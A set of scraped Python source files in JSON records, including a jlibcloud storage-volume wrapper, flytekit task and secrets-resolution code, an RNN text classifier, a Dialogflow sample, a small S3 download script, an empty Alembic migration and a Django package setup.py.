{"ext": "py", "sha": "1a2ea122f01cb5680dc97307e94fd9cddb4075fa", "content": "'''\nCreated on 05.01.2014\n\n@author: root\n'''\nfrom org.askalon.jlibcloud.compute.wrapperInterfaces.base import StorageVolume as JStorageVolume\nfrom javaimpl.compute.utils import none_check\n\nclass StorageVolumeImpl(JStorageVolume):\n '''\n classdocs\n '''\n def __init__(self, volume):\n '''\n Constructor\n '''\n #keep a reference to access in jython\n self.volume = volume\n self.obj = volume\n if hasattr(volume, 'uuid'):\n self.uuidp = none_check(volume.uuid, \"\")\n else:\n self.uuidp = \"\"\n if hasattr(volume, 'id'):\n self.idp = none_check(volume.id, \"\")\n else:\n self.idp = \"\"\n if hasattr(volume, 'name'):\n self.namep = none_check(volume.name, \"\")\n else:\n self.namep = \"\"\n if hasattr(volume, 'size'):\n self.sizep = none_check(volume.size, -1)\n else:\n self.sizep = -1\n if hasattr(volume, 'extra'):\n self.extrap = volume.extra\n else:\n self.extrap = {} \n if hasattr(volume, '__repr__()'):\n self.reprp = volume.__repr__()\n else:\n self.reprp = str(volume) \n \n def getUUID(self):\n return self.uuidp\n \n def getId(self):\n return self.idp\n \n def getName(self):\n return self.namep\n \n def getSizeGB(self):\n return self.sizep\n \n def getExtra(self):\n return self.extrap\n \n def attach(self, node, device=None):\n return self.volume.attach(node.node, device)\n \n def detach(self):\n return self.volume.detach()\n \n def destroy(self):\n return self.volume.destroy()\n \n def listSnapshots(self):\n return self.volume.list_snapshots()\n \n def createSnapshot(self, name):\n return self.volume.snapshot(name)\n \n def toString(self):\n return self.reprp"} {"ext": "py", "sha": "1a2ea2af726cdd1dd54a38cdc9d44649d4b224ba", "content": "from __future__ import annotations\n\nimport copy as _copy\nimport enum\nimport logging as _logging\nimport os\nimport pathlib\nimport typing\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom inspect import getfullargspec as _getargspec\n\nimport six as _six\n\nfrom flytekit.common import constants as _constants\nfrom flytekit.common import interface as _interface\nfrom flytekit.common import sdk_bases as _sdk_bases\nfrom flytekit.common import utils as _common_utils\nfrom flytekit.common.core.identifier import WorkflowExecutionIdentifier\nfrom flytekit.common.exceptions import scopes as _exception_scopes\nfrom flytekit.common.exceptions import user as _user_exceptions\nfrom flytekit.common.tasks import output as _task_output\nfrom flytekit.common.tasks import task as _base_task\nfrom flytekit.common.types import helpers as _type_helpers\nfrom flytekit.configuration import internal as _internal_config\nfrom flytekit.configuration import resources as _resource_config\nfrom flytekit.configuration import sdk as _sdk_config\nfrom flytekit.configuration import secrets\nfrom flytekit.engines import loader as _engine_loader\nfrom flytekit.interfaces.stats import taggable\nfrom flytekit.models import literals as _literal_models\nfrom flytekit.models import task as _task_models\n\n\nclass SecretsManager(object):\n \"\"\"\n This provides a secrets resolution logic at runtime.\n The resolution order is\n - Try env var first. The env var should have the configuration.SECRETS_ENV_PREFIX. The env var will be all upper\n cased\n - If not then try the file where the name matches lower case\n ``configuration.SECRETS_DEFAULT_DIR//configuration.SECRETS_FILE_PREFIX``\n\n All configuration values can always be overridden by injecting an environment variable\n \"\"\"\n\n def __init__(self):\n self._base_dir = str(secrets.SECRETS_DEFAULT_DIR.get()).strip()\n self._file_prefix = str(secrets.SECRETS_FILE_PREFIX.get()).strip()\n self._env_prefix = str(secrets.SECRETS_ENV_PREFIX.get()).strip()\n\n def get(self, group: str, key: str) -> str:\n \"\"\"\n Retrieves a secret using the resolution order -> Env followed by file. If not found raises a ValueError\n \"\"\"\n self.check_group_key(group, key)\n env_var = self.get_secrets_env_var(group, key)\n fpath = self.get_secrets_file(group, key)\n v = os.environ.get(env_var)\n if v is not None:\n return v\n if os.path.exists(fpath):\n with open(fpath, \"r\") as f:\n return f.read().strip()\n raise ValueError(\n f\"Unable to find secret for key {key} in group {group} \" f\"in Env Var:{env_var} and FilePath: {fpath}\"\n )\n\n def get_secrets_env_var(self, group: str, key: str) -> str:\n \"\"\"\n Returns a string that matches the ENV Variable to look for the secrets\n \"\"\"\n self.check_group_key(group, key)\n return f\"{self._env_prefix}{group.upper()}_{key.upper()}\"\n\n def get_secrets_file(self, group: str, key: str) -> str:\n \"\"\"\n Returns a path that matches the file to look for the secrets\n \"\"\"\n self.check_group_key(group, key)\n return os.path.join(self._base_dir, group.lower(), f\"{self._file_prefix}{key.lower()}\")\n\n @staticmethod\n def check_group_key(group: str, key: str):\n if group is None or group == \"\":\n raise ValueError(\"secrets group is a mandatory field.\")\n if key is None or key == \"\":\n raise ValueError(\"secrets key is a mandatory field.\")\n\n\n# TODO: Clean up working dir name\nclass ExecutionParameters(object):\n \"\"\"\n This is a run-time user-centric context object that is accessible to every @task method. It can be accessed using\n\n .. code-block:: python\n\n flytekit.current_context()\n\n This object provides the following\n * a statsd handler\n * a logging handler\n * the execution ID as an :py:class:`flytekit.models.core.identifier.WorkflowExecutionIdentifier` object\n * a working directory for the user to write arbitrary files to\n\n Please do not confuse this object with the :py:class:`flytekit.FlyteContext` object.\n \"\"\"\n\n @dataclass(init=False)\n class Builder(object):\n stats: taggable.TaggableStats\n execution_date: datetime\n logging: _logging\n execution_id: str\n attrs: typing.Dict[str, typing.Any]\n working_dir: typing.Union[os.PathLike, _common_utils.AutoDeletingTempDir]\n\n def __init__(self, current: typing.Optional[ExecutionParameters] = None):\n self.stats = current.stats if current else None\n self.execution_date = current.execution_date if current else None\n self.working_dir = current.working_directory if current else None\n self.execution_id = current.execution_id if current else None\n self.logging = current.logging if current else None\n self.attrs = current._attrs if current else {}\n\n def add_attr(self, key: str, v: typing.Any) -> ExecutionParameters.Builder:\n self.attrs[key] = v\n return self\n\n def build(self) -> ExecutionParameters:\n if not isinstance(self.working_dir, _common_utils.AutoDeletingTempDir):\n pathlib.Path(self.working_dir).mkdir(parents=True, exist_ok=True)\n return ExecutionParameters(\n execution_date=self.execution_date,\n stats=self.stats,\n tmp_dir=self.working_dir,\n execution_id=self.execution_id,\n logging=self.logging,\n **self.attrs,\n )\n\n @staticmethod\n def new_builder(current: ExecutionParameters = None) -> Builder:\n return ExecutionParameters.Builder(current=current)\n\n def builder(self) -> Builder:\n return ExecutionParameters.Builder(current=self)\n\n def __init__(self, execution_date, tmp_dir, stats, execution_id, logging, **kwargs):\n \"\"\"\n Args:\n execution_date: Date when the execution is running\n tmp_dir: temporary directory for the execution\n stats: handle to emit stats\n execution_id: Identifier for the xecution\n logging: handle to logging\n \"\"\"\n self._stats = stats\n self._execution_date = execution_date\n self._working_directory = tmp_dir\n self._execution_id = execution_id\n self._logging = logging\n # AutoDeletingTempDir's should be used with a with block, which creates upon entry\n self._attrs = kwargs\n # It is safe to recreate the Secrets Manager\n self._secrets_manager = SecretsManager()\n\n @property\n def stats(self) -> taggable.TaggableStats:\n \"\"\"\n A handle to a special statsd object that provides usefully tagged stats.\n TODO: Usage examples and better comments\n \"\"\"\n return self._stats\n\n @property\n def logging(self) -> _logging:\n \"\"\"\n A handle to a useful logging object.\n TODO: Usage examples\n \"\"\"\n return self._logging\n\n @property\n def working_directory(self) -> _common_utils.AutoDeletingTempDir:\n \"\"\"\n A handle to a special working directory for easily producing temporary files.\n\n TODO: Usage examples\n TODO: This does not always return a AutoDeletingTempDir\n \"\"\"\n return self._working_directory\n\n @property\n def execution_date(self) -> datetime:\n \"\"\"\n This is a datetime representing the time at which a workflow was started. This is consistent across all tasks\n executed in a workflow or sub-workflow.\n\n .. note::\n\n Do NOT use this execution_date to drive any production logic. It might be useful as a tag for data to help\n in debugging.\n \"\"\"\n return self._execution_date\n\n @property\n def execution_id(self) -> str:\n \"\"\"\n This is the identifier of the workflow execution within the underlying engine. It will be consistent across all\n task executions in a workflow or sub-workflow execution.\n\n .. note::\n\n Do NOT use this execution_id to drive any production logic. This execution ID should only be used as a tag\n on output data to link back to the workflow run that created it.\n \"\"\"\n return self._execution_id\n\n @property\n def secrets(self) -> SecretsManager:\n return self._secrets_manager\n\n def __getattr__(self, attr_name: str) -> typing.Any:\n \"\"\"\n This houses certain task specific context. For example in Spark, it houses the SparkSession, etc\n \"\"\"\n attr_name = attr_name.upper()\n if self._attrs and attr_name in self._attrs:\n return self._attrs[attr_name]\n raise AssertionError(f\"{attr_name} not available as a parameter in Flyte context - are you in right task-type?\")\n\n def has_attr(self, attr_name: str) -> bool:\n attr_name = attr_name.upper()\n if self._attrs and attr_name in self._attrs:\n return True\n return False\n\n def get(self, key: str) -> typing.Any:\n \"\"\"\n Returns task specific context if present else raise an error. The returned context will match the key\n \"\"\"\n return self.__getattr__(attr_name=key)\n\n\nclass SdkRunnableContainer(_task_models.Container, metaclass=_sdk_bases.ExtendedSdkType):\n \"\"\"\n This is not necessarily a local-only Container object. So long as configuration is present, you can use this object\n \"\"\"\n\n def __init__(\n self,\n command,\n args,\n resources,\n env,\n config,\n ):\n super(SdkRunnableContainer, self).__init__(\"\", command, args, resources, env or {}, config)\n\n @property\n def args(self):\n \"\"\"\n :rtype: list[Text]\n \"\"\"\n return _sdk_config.SDK_PYTHON_VENV.get() + self._args\n\n @property\n def image(self):\n \"\"\"\n :rtype: Text\n \"\"\"\n return _internal_config.IMAGE.get()\n\n @property\n def env(self):\n \"\"\"\n :rtype: dict[Text,Text]\n \"\"\"\n env = super(SdkRunnableContainer, self).env.copy()\n env.update(\n {\n _internal_config.CONFIGURATION_PATH.env_var: _internal_config.CONFIGURATION_PATH.get(),\n _internal_config.IMAGE.env_var: _internal_config.IMAGE.get(),\n # TODO: Phase out the below. Propeller will set these and these are not SDK specific\n _internal_config.PROJECT.env_var: _internal_config.PROJECT.get(),\n _internal_config.DOMAIN.env_var: _internal_config.DOMAIN.get(),\n _internal_config.NAME.env_var: _internal_config.NAME.get(),\n _internal_config.VERSION.env_var: _internal_config.VERSION.get(),\n }\n )\n return env\n\n @classmethod\n def get_resources(\n cls,\n storage_request=None,\n cpu_request=None,\n gpu_request=None,\n memory_request=None,\n storage_limit=None,\n cpu_limit=None,\n gpu_limit=None,\n memory_limit=None,\n ):\n \"\"\"\n :param Text storage_request:\n :param Text cpu_request:\n :param Text gpu_request:\n :param Text memory_request:\n :param Text storage_limit:\n :param Text cpu_limit:\n :param Text gpu_limit:\n :param Text memory_limit:\n \"\"\"\n requests = []\n if storage_request:\n requests.append(\n _task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.STORAGE, storage_request)\n )\n if cpu_request:\n requests.append(_task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.CPU, cpu_request))\n if gpu_request:\n requests.append(_task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.GPU, gpu_request))\n if memory_request:\n requests.append(\n _task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.MEMORY, memory_request)\n )\n\n limits = []\n if storage_limit:\n limits.append(\n _task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.STORAGE, storage_limit)\n )\n if cpu_limit:\n limits.append(_task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.CPU, cpu_limit))\n if gpu_limit:\n limits.append(_task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.GPU, gpu_limit))\n if memory_limit:\n limits.append(\n _task_models.Resources.ResourceEntry(_task_models.Resources.ResourceName.MEMORY, memory_limit)\n )\n\n return _task_models.Resources(limits=limits, requests=requests)\n\n\nclass SdkRunnableTaskStyle(enum.Enum):\n V0 = 0\n V1 = 1\n\n\nclass SdkRunnableTask(_base_task.SdkTask, metaclass=_sdk_bases.ExtendedSdkType):\n \"\"\"\n This class includes the additional logic for building a task that executes in Python code. It has even more\n validation checks to ensure proper behavior than it's superclasses.\n\n Since an SdkRunnableTask is assumed to run by hooking into Python code, we will provide additional shortcuts and\n methods on this object.\n \"\"\"\n\n def __init__(\n self,\n task_function,\n task_type,\n discovery_version,\n retries,\n interruptible,\n deprecated,\n storage_request,\n cpu_request,\n gpu_request,\n memory_request,\n storage_limit,\n cpu_limit,\n gpu_limit,\n memory_limit,\n discoverable,\n timeout,\n environment,\n custom,\n ):\n \"\"\"\n :param task_function: Function container user code. This will be executed via the SDK's engine.\n :param Text task_type: string describing the task type\n :param Text discovery_version: string describing the version for task discovery purposes\n :param int retries: Number of retries to attempt\n :param bool interruptible: Specify whether task is interruptible\n :param Text deprecated:\n :param Text storage_request:\n :param Text cpu_request:\n :param Text gpu_request:\n :param Text memory_request:\n :param Text storage_limit:\n :param Text cpu_limit:\n :param Text gpu_limit:\n :param Text memory_limit:\n :param bool discoverable:\n :param datetime.timedelta timeout:\n :param dict[Text, Text] environment:\n :param dict[Text, T] custom:\n \"\"\"\n # Circular dependency\n from flytekit import __version__\n\n self._task_function = task_function\n super(SdkRunnableTask, self).__init__(\n task_type,\n _task_models.TaskMetadata(\n discoverable,\n _task_models.RuntimeMetadata(\n _task_models.RuntimeMetadata.RuntimeType.FLYTE_SDK,\n __version__,\n \"python\",\n ),\n timeout,\n _literal_models.RetryStrategy(retries),\n interruptible,\n discovery_version,\n deprecated,\n ),\n # TODO: If we end up using SdkRunnableTask for the new code, make sure this is set correctly.\n _interface.TypedInterface({}, {}),\n custom,\n container=self._get_container_definition(\n storage_request=storage_request,\n cpu_request=cpu_request,\n gpu_request=gpu_request,\n memory_request=memory_request,\n storage_limit=storage_limit,\n cpu_limit=cpu_limit,\n gpu_limit=gpu_limit,\n memory_limit=memory_limit,\n environment=environment,\n ),\n )\n self.id._name = \"{}.{}\".format(self.task_module, self.task_function_name)\n self._has_fast_registered = False\n\n # TODO: Remove this in the future, I don't think we'll be using this.\n self._task_style = SdkRunnableTaskStyle.V0\n\n _banned_inputs = {}\n _banned_outputs = {}\n\n @_exception_scopes.system_entry_point\n def add_inputs(self, inputs):\n \"\"\"\n Adds the inputs to this task. This can be called multiple times, but it will fail if an input with a given\n name is added more than once, a name collides with an output, or if the name doesn't exist as an arg name in\n the wrapped function.\n :param dict[Text, flytekit.models.interface.Variable] inputs: names and variables\n \"\"\"\n self._validate_inputs(inputs)\n self.interface.inputs.update(inputs)\n\n @classmethod\n def promote_from_model(cls, base_model):\n # TODO: If the task exists in this container, we should be able to retrieve it.\n raise _user_exceptions.FlyteAssertion(\"Cannot promote a base object to a runnable task.\")\n\n @property\n def task_style(self):\n return self._task_style\n\n @property\n def task_function(self):\n return self._task_function\n\n @property\n def task_function_name(self):\n \"\"\"\n :rtype: Text\n \"\"\"\n return self.task_function.__name__\n\n @property\n def task_module(self):\n \"\"\"\n :rtype: Text\n \"\"\"\n return self._task_function.__module__\n\n def validate(self):\n super(SdkRunnableTask, self).validate()\n missing_args = self._missing_mapped_inputs_outputs()\n if len(missing_args) > 0:\n raise _user_exceptions.FlyteAssertion(\n \"The task {} is invalid because not all inputs and outputs in the \"\n \"task function definition were specified in @outputs and @inputs. \"\n \"We are missing definitions for {}.\".format(self, missing_args)\n )\n\n @_exception_scopes.system_entry_point\n def unit_test(self, **input_map):\n \"\"\"\n :param dict[Text, T] input_map: Python Std input from users. We will cast these to the appropriate Flyte\n literals.\n :returns: Depends on the behavior of the specific task in the unit engine.\n \"\"\"\n return (\n _engine_loader.get_engine(\"unit\")\n .get_task(self)\n .execute(\n _type_helpers.pack_python_std_map_to_literal_map(\n input_map,\n {\n k: _type_helpers.get_sdk_type_from_literal_type(v.type)\n for k, v in _six.iteritems(self.interface.inputs)\n },\n )\n )\n )\n\n @_exception_scopes.system_entry_point\n def local_execute(self, **input_map):\n \"\"\"\n :param dict[Text, T] input_map: Python Std input from users. We will cast these to the appropriate Flyte\n literals.\n :rtype: dict[Text, T]\n :returns: The output produced by this task in Python standard format.\n \"\"\"\n return (\n _engine_loader.get_engine(\"local\")\n .get_task(self)\n .execute(\n _type_helpers.pack_python_std_map_to_literal_map(\n input_map,\n {\n k: _type_helpers.get_sdk_type_from_literal_type(v.type)\n for k, v in _six.iteritems(self.interface.inputs)\n },\n )\n )\n )\n\n def _execute_user_code(self, context, inputs):\n \"\"\"\n :param flytekit.engines.common.EngineContext context:\n :param dict[Text, T] inputs: This variable is a bit of a misnomer, since it's both inputs and outputs. The\n dictionary passed here will be passed to the user-defined function, and will have values that are a\n variety of types. The T's here are Python std values for inputs. If there isn't a native Python type for\n something (like Schema or Blob), they are the Flyte classes. For outputs they are OutputReferences.\n (Note that these are not the same OutputReferences as in BindingData's)\n :rtype: Any: the returned object from user code.\n :returns: This function must return a dictionary mapping 'filenames' to Flyte Interface Entities. These\n entities will be used by the engine to pass data from node to node, populate metadata, etc. etc.. Each\n engine will have different behavior. For instance, the Flyte engine will upload the entities to a remote\n working directory (with the names provided), which will in turn allow Flyte Propeller to push along the\n workflow. Where as local engine will merely feed the outputs directly into the next node.\n \"\"\"\n if self.task_style == SdkRunnableTaskStyle.V0:\n return _exception_scopes.user_entry_point(self.task_function)(\n ExecutionParameters(\n execution_date=context.execution_date,\n # TODO: it might be better to consider passing the full struct\n execution_id=_six.text_type(WorkflowExecutionIdentifier.promote_from_model(context.execution_id)),\n stats=context.stats,\n logging=context.logging,\n tmp_dir=context.working_directory,\n ),\n **inputs,\n )\n\n @_exception_scopes.system_entry_point\n def execute(self, context, inputs):\n \"\"\"\n :param flytekit.engines.common.EngineContext context:\n :param flytekit.models.literals.LiteralMap inputs:\n :rtype: dict[Text, flytekit.models.common.FlyteIdlEntity]\n :returns: This function must return a dictionary mapping 'filenames' to Flyte Interface Entities. These\n entities will be used by the engine to pass data from node to node, populate metadata, etc. etc.. Each\n engine will have different behavior. For instance, the Flyte engine will upload the entities to a remote\n working directory (with the names provided), which will in turn allow Flyte Propeller to push along the\n workflow. Where as local engine will merely feed the outputs directly into the next node.\n \"\"\"\n inputs_dict = _type_helpers.unpack_literal_map_to_sdk_python_std(\n inputs, {k: _type_helpers.get_sdk_type_from_literal_type(v.type) for k, v in self.interface.inputs.items()}\n )\n outputs_dict = {\n name: _task_output.OutputReference(_type_helpers.get_sdk_type_from_literal_type(variable.type))\n for name, variable in _six.iteritems(self.interface.outputs)\n }\n\n # Old style - V0: If annotations are used to define outputs, do not append outputs to the inputs dict\n if not self.task_function.__annotations__ or \"return\" not in self.task_function.__annotations__:\n inputs_dict.update(outputs_dict)\n self._execute_user_code(context, inputs_dict)\n return {\n _constants.OUTPUT_FILE_NAME: _literal_models.LiteralMap(\n literals={k: v.sdk_value for k, v in _six.iteritems(outputs_dict)}\n )\n }\n\n @_exception_scopes.system_entry_point\n def fast_register(self, project, domain, name, digest, additional_distribution, dest_dir) -> str:\n \"\"\"\n The fast register call essentially hijacks the task container commandline.\n Say an existing task container definition had a commandline like so:\n flyte_venv pyflyte-execute --task-module app.workflows.my_workflow --task-name my_task\n\n The fast register command introduces a wrapper call to fast-execute the original commandline like so:\n flyte_venv pyflyte-fast-execute --additional-distribution s3://my-s3-bucket/foo/bar/12345.tar.gz --\n flyte_venv pyflyte-execute --task-module app.workflows.my_workflow --task-name my_task\n\n At execution time pyflyte-fast-execute will ensure the additional distribution (i.e. the fast-registered code)\n exists before calling the original task commandline.\n\n :param Text project: The project in which to register this task.\n :param Text domain: The domain in which to register this task.\n :param Text name: The name to give this task.\n :param Text digest: The version in which to register this task.\n :param Text additional_distribution: User-specified location for remote source code distribution.\n :param Text The optional location for where to install the additional distribution at runtime\n :rtype: Text: Registered identifier.\n \"\"\"\n\n original_container = self.container\n container = _copy.deepcopy(original_container)\n args = [\"pyflyte-fast-execute\", \"--additional-distribution\", additional_distribution]\n if dest_dir:\n args += [\"--dest-dir\", dest_dir]\n args += [\"--\"] + container.args\n container._args = args\n self._container = container\n\n try:\n registered_id = self.register(project, domain, name, digest)\n except Exception:\n self._container = original_container\n raise\n self._has_fast_registered = True\n self._container = original_container\n return str(registered_id)\n\n @property\n def has_fast_registered(self) -> bool:\n return self._has_fast_registered\n\n def _get_container_definition(\n self,\n storage_request=None,\n cpu_request=None,\n gpu_request=None,\n memory_request=None,\n storage_limit=None,\n cpu_limit=None,\n gpu_limit=None,\n memory_limit=None,\n environment=None,\n cls=None,\n ):\n \"\"\"\n :param Text storage_request:\n :param Text cpu_request:\n :param Text gpu_request:\n :param Text memory_request:\n :param Text storage_limit:\n :param Text cpu_limit:\n :param Text gpu_limit:\n :param Text memory_limit:\n :param dict[Text,Text] environment:\n :param cls Optional[type]: Type of container to instantiate. Generally should subclass SdkRunnableContainer.\n :rtype: flytekit.models.task.Container\n \"\"\"\n storage_limit = storage_limit or _resource_config.DEFAULT_STORAGE_LIMIT.get()\n storage_request = storage_request or _resource_config.DEFAULT_STORAGE_REQUEST.get()\n cpu_limit = cpu_limit or _resource_config.DEFAULT_CPU_LIMIT.get()\n cpu_request = cpu_request or _resource_config.DEFAULT_CPU_REQUEST.get()\n gpu_limit = gpu_limit or _resource_config.DEFAULT_GPU_LIMIT.get()\n gpu_request = gpu_request or _resource_config.DEFAULT_GPU_REQUEST.get()\n memory_limit = memory_limit or _resource_config.DEFAULT_MEMORY_LIMIT.get()\n memory_request = memory_request or _resource_config.DEFAULT_MEMORY_REQUEST.get()\n\n resources = SdkRunnableContainer.get_resources(\n storage_request, cpu_request, gpu_request, memory_request, storage_limit, cpu_limit, gpu_limit, memory_limit\n )\n\n return (cls or SdkRunnableContainer)(\n command=[],\n args=[\n \"pyflyte-execute\",\n \"--task-module\",\n self.task_module,\n \"--task-name\",\n self.task_function_name,\n \"--inputs\",\n \"{{.input}}\",\n \"--output-prefix\",\n \"{{.outputPrefix}}\",\n \"--raw-output-data-prefix\",\n \"{{.rawOutputDataPrefix}}\",\n ],\n resources=resources,\n env=environment,\n config={},\n )\n\n def _validate_inputs(self, inputs):\n \"\"\"\n This method should be overridden in sub-classes that intend to do additional checks on inputs. If validation\n fails, this function should raise an informative exception.\n :param dict[Text, flytekit.models.interface.Variable] inputs: Input variables to validate\n :raises: flytekit.common.exceptions.user.FlyteValidationException\n \"\"\"\n super(SdkRunnableTask, self)._validate_inputs(inputs)\n for k, v in _six.iteritems(inputs):\n if not self._is_argname_in_function_definition(k):\n raise _user_exceptions.FlyteValidationException(\n \"The input named '{}' was not specified in the task function. Therefore, this input cannot be \"\n \"provided to the task.\".format(k)\n )\n if _type_helpers.get_sdk_type_from_literal_type(v.type) in type(self)._banned_inputs:\n raise _user_exceptions.FlyteValidationException(\n \"The input '{}' is not an accepted input type.\".format(v)\n )\n\n def _validate_outputs(self, outputs):\n \"\"\"\n This method should be overridden in sub-classes that intend to do additional checks on outputs. If validation\n fails, this function should raise an informative exception.\n :param dict[Text, flytekit.models.interface.Variable] outputs: Output variables to validate\n :raises: flytekit.common.exceptions.user.FlyteValidationException\n \"\"\"\n super(SdkRunnableTask, self)._validate_outputs(outputs)\n for k, v in _six.iteritems(outputs):\n if not self._is_argname_in_function_definition(k):\n raise _user_exceptions.FlyteValidationException(\n \"The output named '{}' was not specified in the task function. Therefore, this output cannot be \"\n \"provided to the task.\".format(k)\n )\n if _type_helpers.get_sdk_type_from_literal_type(v.type) in type(self)._banned_outputs:\n raise _user_exceptions.FlyteValidationException(\n \"The output '{}' is not an accepted output type.\".format(v)\n )\n\n def _get_kwarg_inputs(self):\n # Trim off first parameter as it is reserved for workflow_parameters\n return set(_getargspec(self.task_function).args[1:])\n\n def _is_argname_in_function_definition(self, key):\n return key in self._get_kwarg_inputs()\n\n def _missing_mapped_inputs_outputs(self):\n # Trim off first parameter as it is reserved for workflow_parameters\n args = self._get_kwarg_inputs()\n inputs_and_outputs = set(self.interface.outputs.keys()) | set(self.interface.inputs.keys())\n return args ^ inputs_and_outputs\n"} {"ext": "py", "sha": "1a2ea3181e94fd94bc50e28da8a2d0ae58cf4fe6", "content": "# A sample recursive neural network for text classification\n# @Time: 8/13/2020\n# @Author: lnblanke\n# @Email: fjh314.84@gmail.com\n# @File: cnn.py\n\nimport numpy as np\nimport tensorflow as tf\nfrom blocks import RNN, Dense\nfrom model import Model\nimport os\n\npath = os.path.join(\"glove.6B.100d.txt\")\n\nembedding_indices = {}\n\nwith open(path) as f:\n for line in f:\n word, coef = line.split(maxsplit = 1)\n coef = np.fromstring(coef, \"f\", sep = \" \")\n\n embedding_indices[word] = coef\n\n\ndef embedding(x):\n word_idx = tf.keras.datasets.imdb.get_word_index()\n embedding_dim = 100\n\n l, w = x.shape\n embed = np.zeros((l, w, embedding_dim))\n\n vec_to_word = {vec + 3: ww for ww, vec in word_idx.items()}\n vec_to_word[0] = \"\"\n vec_to_word[1] = \"\"\n vec_to_word[2] = \"\"\n\n for i in range(l):\n for j in range(w):\n embedding_vec = embedding_indices.get(vec_to_word[x[i][j]])\n\n if embedding_vec is not None:\n embed[i][j] = embedding_vec\n\n return embed\n\n\nword_size = 15000\n\n(train_x, train_y), (test_x, test_y) = tf.keras.datasets.imdb.load_data(num_words = word_size)\n\nmax_len = 300\ntrain_x = tf.keras.preprocessing.sequence.pad_sequences(train_x, max_len)[:1000]\ntrain_y = train_y[:1000]\ntest_x = tf.keras.preprocessing.sequence.pad_sequences(test_x, max_len)[:200]\ntest_y = test_y[:200]\n\ntrain_x_embed = embedding(train_x)\ntest_x_embed = embedding(test_x)\n\nrate = 1e-2 # Learning rate\nepoch = 100 # Learning epochs\npatience = 10 # Early stop patience\n\nmodel = Model(\"RNN\")\nmodel.add(RNN(input_size = 100, output_size = 64, units = 128))\nmodel.add(Dense(64, 2, activation = \"softmax\"))\n\nif __name__ == '__main__':\n model.fit(train_x_embed, train_y, loss_func = \"cross entropy loss\", epochs = epoch, learning_rate = rate,\n patience = patience)\n\n pred = model.predict(test_x_embed)\n\n print(\"Accuracy: %.2f\" % (np.sum(pred == test_y) / len(test_y) * 100) + \"%\")\n"} {"ext": "py", "sha": "1a2ea31bf03207358eb5c02a59efac22ead89f6f", "content": "# -*- coding: utf-8 -*-\n# Copyright 2022 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Generated code. DO NOT EDIT!\n#\n# Snippet for CreateDocument\n# NOTE: This snippet has been automatically generated for illustrative purposes only.\n# It may require modifications to work in your environment.\n\n# To install the latest published package dependency, execute the following:\n# python3 -m pip install google-cloud-dialogflow\n\n\n# [START dialogflow_v2_generated_Documents_CreateDocument_sync]\nfrom google.cloud import dialogflow_v2\n\n\ndef sample_create_document():\n # Create a client\n client = dialogflow_v2.DocumentsClient()\n\n # Initialize request argument(s)\n document = dialogflow_v2.Document()\n document.content_uri = \"content_uri_value\"\n document.display_name = \"display_name_value\"\n document.mime_type = \"mime_type_value\"\n document.knowledge_types = \"AGENT_FACING_SMART_REPLY\"\n\n request = dialogflow_v2.CreateDocumentRequest(\n parent=\"parent_value\",\n document=document,\n )\n\n # Make the request\n operation = client.create_document(request=request)\n\n print(\"Waiting for operation to complete...\")\n\n response = operation.result()\n\n # Handle the response\n print(response)\n\n# [END dialogflow_v2_generated_Documents_CreateDocument_sync]\n"} {"ext": "py", "sha": "1a2ea33be5b1c12b6b57d8e9ec275581e3599fc4", "content": "#Download Data and Save Data\n\nimport urllib\n\nprint \"downloading with urllib\"\ndl_url = http://s3.amazonaws.com/open_data/*\nurllib.urlretrieve(dl_url)\n\n\n# file1 = opendata_giftcards000.gz\n# file2 = opendata_giving_page_projects000.gz\n# file3 = opendata_giving_pages000.gz\n# file4 = opendata_essays000.gz\n# file5 = opendata_resources000.gz\n# file6 = opendata_donations000.gz\n# file7 = opendata_projects000.gz\n\n\n\n# http://s3.amazonaws.com/open_data/opendata_giftcards000.gz\n# http://s3.amazonaws.com/open_data/opendata_giving_page_projects000.gz\n# http://s3.amazonaws.com/open_data/opendata_giving_pages000.gz\n# http://s3.amazonaws.com/open_data/opendata_essays000.gz\n# http://s3.amazonaws.com/open_data/opendata_resources000.gz\n# http://s3.amazonaws.com/open_data/opendata_donations000.gz\n# http://s3.amazonaws.com/open_data/opendata_projects000.gz"} {"ext": "py", "sha": "1a2ea363968078399a54b10dc83f806c9fe801d3", "content": "\"\"\"Initial migration\n\nRevision ID: e4ef83148109\nRevises: \nCreate Date: 2021-11-25 12:45:30.514576\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e4ef83148109'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n pass\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n pass\n # ### end Alembic commands ###\n"} {"ext": "py", "sha": "1a2ea3684f76dacee9cee3bfdd0a4cf2e4102106", "content": "import os\nfrom setuptools import setup, find_packages\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django_admin_monitoring',\n version='0.1.3',\n packages=find_packages(),\n include_package_data=True,\n license='MIT License',\n description='A simple Django app that provides ability to monitor such things as user feedback in admin',\n long_description=README,\n url='https://github.com/eternalfame/django_admin_monitoring',\n author='Vyacheslav Sukhenko',\n author_email='eternalfame@mail.ru',\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n)"} {"ext": "py", "sha": "1a2ea48516f54a1066414fdda5b0d25b2432255c", "content": "# Authors: Peter 